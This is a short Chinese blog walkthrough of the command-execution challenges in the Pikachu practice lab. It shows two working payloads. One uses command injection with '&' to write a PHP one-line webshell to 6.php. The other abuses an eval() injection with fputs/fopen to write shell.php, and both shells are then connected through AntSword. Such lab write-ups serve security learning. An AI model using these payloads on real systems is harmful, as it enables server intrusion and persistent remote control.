Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
杜子不疼.1 分钟前
【Linux】进程概念(六):地址空间核心机制
linux·运维·服务器
g***96902 分钟前
在Nginx上配置并开启WebDAV服务的完整指南
java·运维·nginx
伯远医学2 分钟前
CUT&RUN
java·服务器·网络·人工智能·python·算法·eclipse
2401_840192272 分钟前
curl -v 对于运维来说,比f12可能更适合
运维
APIshop3 分钟前
1688 拍立淘接口 item_search_img 返回值超细说明
linux·运维·服务器
礼拜天没时间.3 分钟前
《Grafana 企业级可视化监控实战指南:从安装、配置到智能告警》:Grafana 安装部署
linux·运维·信息可视化·zabbix·grafana·监控
乾博电子3 分钟前
用电安全守护神!RCMX-ONE剩余电流监视器,精准防患
安全·在线监测·故障定位·在线绝缘监测仪·绝缘监测仪
Dest1ny-安全6 分钟前
CTF 及网络安全相关平台汇总表
java·运维·服务器·python·安全·web安全
小兔薯了7 分钟前
12.SMB 服务器
android·运维·服务器·nginx·php
智链RFID7 分钟前
信创RFID:涉密数据共享的“安全密钥”
网络·人工智能·安全
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06本地部署阿里最新开源的Z-Image07【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连0846个Nano-banana 精选提示词,持续更新中09Labelme从安装到标注:零基础完整指南10Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽